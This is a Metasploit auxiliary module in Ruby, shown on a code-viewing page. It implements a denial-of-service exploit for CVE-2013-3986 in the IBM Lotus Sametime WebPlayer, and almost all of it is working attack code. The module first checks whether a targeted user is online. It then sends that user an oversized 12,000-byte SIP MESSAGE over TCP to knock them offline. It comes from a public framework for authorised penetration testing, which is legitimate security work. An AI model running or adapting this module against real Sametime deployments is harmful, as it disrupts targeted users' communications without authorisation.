Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'       => 'IBM Lotus Sametime WebPlayer DoS',
13
      'Description'  => %q{
14
        This module exploits a known flaw in the IBM Lotus Sametime WebPlayer
15
        version 8.5.2.1392 (and prior) to cause a denial of service condition
16
        against specific users. For this module to function the target user
17
        must be actively logged into the IBM Lotus Sametime server and have
18
        the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a
19
        browser extension. The user should have the WebPlayer plug-in active
20
        (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.
21
      },
22
      'Author'     =>
23
        [
24
          'Chris John Riley', # Vulnerability discovery
25
          'kicks4kittens' # Metasploit module
26
        ],
27
      'License'    => MSF_LICENSE,
28
      'Actions'    =>
29
        [
30
          ['DOS',
31
            {
32
              'Description' => 'Cause a Denial Of Service condition against a connected user'
33
            }
34
          ],
35
          ['CHECK',
36
            {
37
              'Description' => 'Checking if targeted user is online'
38
            }
39
          ]
40
        ],
41
      'DefaultAction'  => 'DOS',
42
      'References'   =>
43
        [
44
          [ 'CVE', '2013-3986' ],
45
          [ 'OSVDB', '99552' ],
46
          [ 'BID', '63611'],
47
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21654041' ],
48
          [ 'URL', 'http://xforce.iss.net/xforce/xfdb/84969' ]
49
        ],
50
      'DisclosureDate' => '2013-11-07'))
51

52
    register_options(
53
      [
54
        Opt::RPORT(5060),
55
        OptAddress.new('RHOST', [true, 'The Sametime Media Server']),
56
        OptString.new('SIPURI', [
57
          true,
58
          'The SIP URI of the user to be targeted',
59
          '<target_email_address>@<sametime_media_server_FQDN>'
60
        ]),
61
        OptInt.new('TIMEOUT', [ true,  'Set specific response timeout', 0])
62
      ])
63

64
  end
65

66
  def setup
67
    # cleanup SIP target to ensure it's in the correct format to use
68
    @sipuri = datastore['SIPURI']
69
    if @sipuri[0, 4].downcase == "sip:"
70
      # remove sip: if present in string
71
      @sipuri = @sipuri[4, @sipuri.length]
72
    end
73
    if @sipuri[0, 12].downcase == "webavclient-"
74
      # remove WebAVClient- if present in string
75
      @sipuri = @sipuri[12, @sipuri.length]
76
    end
77
  end
78

79
  def run
80
    # inform user of action currently selected
81
    print_status("Action: #{action.name} selected")
82

83
    # CHECK action
84
    if action.name == 'CHECK'
85
      print_status("Checking if user #{@sipuri} is online")
86
      if check_user
87
        print_good("User online")
88
      else
89
        print_status("User offline")
90
      end
91
      return
92
    end
93

94
    # DOS action
95
    print_status("Checking if user #{@sipuri} is online")
96
    check_result = check_user
97

98
    if check_result == false
99
      print_error("User is already offline... Exiting...")
100
      return
101
    end
102

103
    # only proceed if action is DOS the target user is
104
    # online or the CHECKUSER option has been disabled
105
    print_status("Targeting user: #{@sipuri}...")
106
    dos_result = dos_user
107

108
    if dos_result
109
      print_good("User is offline, DoS was successful")
110
    else
111
      print_error("User is still online")
112
    end
113

114
  end
115

116
  def dos_user
117
    length = 12000 # enough to overflow the end of allocated memory
118
    msg = create_message(length)
119
    res = send_msg(msg)
120

121
    if res.nil?
122
      vprint_good("User #{@sipuri} is no responding")
123
      return true
124
    elsif res =~ /430 Flow Failed/i
125
      vprint_good("DoS packet successful. Response received (430 Flow Failed)")
126
      vprint_good("User #{@sipuri} is no longer responding")
127
      return true
128
    elsif res =~ /404 Not Found/i
129
      vprint_error("DoS packet appears successful. Response received (404 Not Found)")
130
      vprint_status("User appears to be currently offline or not in a Sametime video session")
131
      return true
132
    elsif res =~ /200 OK/i
133
      vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)")
134
      vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer")
135
      return false
136
    else
137
      vprint_status("Unexpected response")
138
      return true
139
    end
140
  end
141

142
  # used to check the user is logged into Sametime and after DoS to check success
143
  def check_user
144
    length = Rex::Text.rand_text_numeric(2) # just enough to check response
145
    msg = create_message(length)
146
    res = send_msg(msg)
147

148
    # check response for current user status - common return codes
149
    if res.nil?
150
      vprint_error("No response")
151
      return false
152
    elsif res =~ /430 Flow Failed/i
153
      vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)")
154
      return false
155
    elsif res =~ /404 Not Found/i
156
      vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session")
157
      return false
158
    elsif res =~ /200 OK/i
159
      vprint_good("User #{@sipuri} is online")
160
      return true
161
    else
162
      vprint_error("Unknown server response")
163
      return false
164
    end
165
  end
166

167
  def create_message(length)
168
    # create SIP MESSAGE of specified length
169
    vprint_status("Creating SIP MESSAGE packet #{length} bytes long")
170

171
    source_user = Rex::Text.rand_text_alphanumeric(rand(8)+1)
172
    source_host = Rex::Socket.source_address(datastore['RHOST'])
173
    src = "#{source_host}:#{datastore['RPORT']}"
174
    cseq = Rex::Text.rand_text_numeric(3)
175
    message_text = Rex::Text.rand_text_alphanumeric(length.to_i)
176
    branch = Rex::Text.rand_text_alphanumeric(7)
177

178
    # setup SIP message in the correct format expected by the server
179
    data =  "MESSAGE sip:WebAVClient-#{@sipuri} SIP/2.0" + "\r\n"
180
    data << "Via: SIP/2.0/TCP #{src};branch=#{branch}.#{"%.8x" % rand(0x100000000)};rport;alias" + "\r\n"
181
    data << "Max-Forwards: 80\r\n"
182
    data << "To: sip:WebAVClient-#{@sipuri}" + "\r\n"
183
    data << "From: sip:#{source_user}@#{src};tag=70c00e8c" + "\r\n"
184
    data << "Call-ID: #{rand(0x100000000)}@#{source_host}" + "\r\n"
185
    data << "CSeq: #{cseq} MESSAGE" + "\r\n"
186
    data << "Content-Type: text/plain;charset=utf-8" + "\r\n"
187
    data << "User-Agent: #{source_user}\r\n"
188
    data << "Content-Length: #{message_text.length}" + "\r\n\r\n"
189
    data << message_text
190

191
    return data
192
  end
193

194
  def timing_get_once(s, length)
195
    if datastore['TIMEOUT'] and datastore['TIMEOUT'] > 0
196
      return s.get_once(length, datastore['TIMEOUT'])
197
    else
198
      return s.get_once(length)
199
    end
200
  end
201

202
  def send_msg(msg)
203
    begin
204
      s = connect
205
      # send message and store response
206
      s.put(msg + "\r\n\r\n") rescue nil
207
      # read response
208
      res = timing_get_once(s, 25)
209
      if res == "\r\n"
210
        # retry request
211
        res = timing_get_once(s, 25)
212
      end
213
      return res
214
    rescue ::Rex::ConnectionRefused
215
      print_status("Unable to connect")
216
      return nil
217
    rescue ::Errno::ECONNRESET
218
      print_good("DoS packet successful, host not responding.")
219
      return nil
220
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
221
      print_status("Couldn't connect")
222
      return nil
223
    ensure
224
      # disconnect socket if still open
225
      disconnect if s
226
    end
227
  end
228
end
229

230